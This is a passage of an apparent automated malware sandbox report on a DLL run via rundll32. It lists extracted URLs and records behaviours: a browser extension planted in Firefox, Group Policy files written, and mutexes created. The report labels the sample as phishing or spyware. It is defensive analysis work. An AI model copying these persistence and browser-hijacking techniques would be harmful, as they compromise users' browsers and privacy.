Source: rundll32.exe, 00000004.00000003.1725918469.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1725918469.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
Source: omni.ja.bak.3.drString found in binary or memory: https://duckduckgo.com/?q=
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/docs/v2-system-addon/about_home_st
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/browser/urlbar/telemetry.html
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/dom/ipc/jsactors.html
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/bestpractices.html#detecting-and-avoiding-synchr
Source: omni.ja.bak.3.drString found in binary or memory: https://firefox.dns.nextdns.io/
Source: omni.ja.bak.3.drString found in binary or memory: https://fpn.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/firefox-devtools/debugger/blob/master/assets/panel/prefs.js
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/mozilla-services/mozilla-pipeline-schemas
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request
Source: omni.ja.bak.3.drString found in binary or memory: https://github.com/web-platform-tests/wpt
Source: omni.ja.bak.3.drString found in binary or memory: https://groups.google.com/forum/#
Source: omni.ja.bak.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/microdata.html#values
Source: omni.ja.bak.3.drString found in binary or memory: https://ideas.mozilla.org/
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: omni.ja.bak.3.drString found in binary or memory: https://install.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://ipfs.io/ipfs/QmXoypizjW3WknFiJnKLwHCnL72vedxjQkDDP1mXWo6uco/wiki/List_of_Google_domains.html
Source: omni.ja.bak.3.drString found in binary or memory: https://main--perf-html.netlify.app
Source: omni.ja.bak.3.drString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: omni.ja.bak.3.drString found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: rundll32.exe, 00000004.00000003.1665124584.0000000002CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnthor.xyz
Source: rundll32.exe, 00000004.00000003.1665124584.0000000002CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1665124584.0000000002CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnthor.xyzdesktop-notification
Source: rundll32.exe, 00000004.00000003.1665124584.0000000002CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mnthor.xyzxyzad.xyz
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/about
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/breach-details/
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: omni.ja.bak.3.drString found in binary or memory: https://monitor.firefox.com/user/preferences
Source: omni.ja.bak.3.drString found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: omni.ja.bak.3.drString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: omni.ja.bak.3.drString found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: omni.ja.bak.3.drString found in binary or memory: https://opengraphprotocol.org/)
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.googl
Source: rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsy
Source: omni.ja.bak.3.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: omni.ja.bak.3.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: omni.ja.bak.3.drString found in binary or memory: https://profile.accounts.firefox.com/v1
Source: omni.ja.bak.3.drString found in binary or memory: https://profiler.firefox.com
Source: rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js8
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsx
Source: omni.ja.bak.3.drString found in binary or memory: https://schema.org
Source: omni.ja.bak.3.drString found in binary or memory: https://schema.org/
Source: omni.ja.bak.3.drString found in binary or memory: https://screenshots.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://search.avast.com/AV752/
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/rev/560b7b1b17/browser/themes/shared/tabs.css#624
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/s
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/search?q=search-telemetry-schema.json
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/source/browser/installer/windows/msix/AppxManifest.xml.in.
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/source/browser/installer/windows/nsis/shared.nsh
Source: omni.ja.bak.3.drString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: omni.ja.bak.3.drString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: rundll32.exe, 00000003.00000003.1666746155.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666780653.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666684582.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg09W
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svgp
Source: omni.ja.bak.3.drString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: omni.ja.bak.3.drString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: omni.ja.bak.3.drString found in binary or memory: https://stackoverflow.com/a/32724723.
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: omni.ja.bak.3.drString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: omni.ja.bak.3.drString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: omni.ja.bak.3.drString found in binary or memory: https://topsites.mozilla.com/cid/foo.
Source: omni.ja.bak.3.drString found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: omni.ja.bak.3.drString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: omni.ja.bak.3.drString found in binary or memory: https://truecolors.firefox.com
Source: omni.ja.bak.3.drString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: omni.ja.bak.3.drString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: omni.ja.bak.3.drString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: omni.ja.bak.3.drString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: omni.ja.bak.3.drString found in binary or memory: https://www.foo.com
Source: omni.ja.bak.3.drString found in binary or memory: https://www.foo.com:1234
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748100105.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748125900.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/:
Source: omni.ja.bak.3.drString found in binary or memory: https://www.google.com/?bcutc=sp-004-752
Source: rundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748301069.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?h=6fiz7bk1dli28pjdzprzc2iifgzk4e22xjoo.ja7lk70wr
Source: rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748431003.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748391683.0000000003385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp, Secure Preferences.3.drString found in binary or memory: https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifak
Source: rundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?h=tyjjeh2ogi3qqdrbygpj96fo04sd8rncm8xt.gg4fdx0u7lease
Source: rundll32.exe, 00000004.00000003.1725949573.0000000002D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/C=
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
Source: rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly8N
Source: rundll32.exe, 00000004.00000003.1725918469.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrao
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: omni.ja.bak.3.drString found in binary or memory: https://www.maps.google.com/a/place
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/firefox/new/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: omni.ja.bak.3.drString found in binary or memory: https://www.yahoo.com/?fr=hp-avast&type=752

System Summary

barindex
Found suspicious ZIP file
Source: {EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi.3.drZip Entry: main.js
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\system32\GroupPolicy\AdmJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\system32\GroupPolicy\MachineJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\system32\GroupPolicy\UserJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\system32\GroupPolicy\Machine\Registry.polJump to behavior
Source: GqjUrFW.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal84.phis.spyw.winDLL@10/143@0/0
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporterJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H143457741
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H114011913
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\2_PhpuzIakkdPWqpI
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H5174114
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H139200187
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H94612912
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H52000344
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Global\1_H106351840
Source: GqjUrFW.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Program Files\Mozilla Firefox\application.iniJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
